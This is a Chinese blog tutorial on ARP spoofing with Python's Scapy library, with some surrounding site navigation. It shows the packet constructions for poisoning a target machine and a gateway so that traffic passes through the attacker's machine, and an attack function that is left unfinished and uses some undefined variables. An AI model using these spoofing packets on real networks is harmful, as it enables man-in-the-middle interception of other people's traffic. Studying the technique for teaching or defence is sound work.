前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Python-Scapy之ARP欺骗(2)

Python-Scapy之ARP欺骗(2)

作者头像
偏有宸机
发布2020-11-04 10:18:04
5640
发布2020-11-04 10:18:04
举报
文章被收录于专栏:宸机笔记
代码语言:javascript
复制
from scapy.all import Ether,ARP,sendp,getmacbyip

Ether:用来构建以太网数据包 ARP:构建ARP数据包的类 sendp:在第二层发送数据包 getmacbyip:返回对应IP的MAC地址

核心部分:

伪造网关 欺骗目标计算机:

Ether(src=[本机MAC],dst=[目标MAC])/ARP(hwsrc=[本机MAC],psrc=[网管IP],hwdst=[目标MAC],pdst=[目标IP],op=2)

ARP将网关IP地址映射到本机MAC上,针对dst即目标(dst值为空时,针对当前网段所有IP);Ether以网关身份向目标发包

伪造目标计算机 欺骗网关:

Ether(src=[本机MAC],dst=[网关MAC])/ARP(hwsrc=[本机MAC],psrc=[目标IP],hwdst=[网关MAC],pdst=[网关IP],op=2)

ARP将目标IP地址映射到本机MAC上,针对网关;Ether以目标身份向网关发包(猜测psrc不填时,将伪造当前网段内所有IP的发包) op表示ARP响应

代码语言:javascript
复制
from scapy.all import Ether,ARP,sendp,getmacbyip,get_if_hwaddr
bjMAC=get_if_hwaddr(wk)
mbMAC=getmacbyip(mbIP)
wgMAC=getmacbyip(wgIP)
ether=Ether()
arp=ARP()
def arpSpoof(mbMAC,wgMAC,bjMAC):
	try:
		eth.src=bjMAC
		eth.dst=wgMAC
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2018-05-08,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 核心部分:
    • 伪造网关 欺骗目标计算机:
      • 伪造目标计算机 欺骗网关:
      领券
      问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档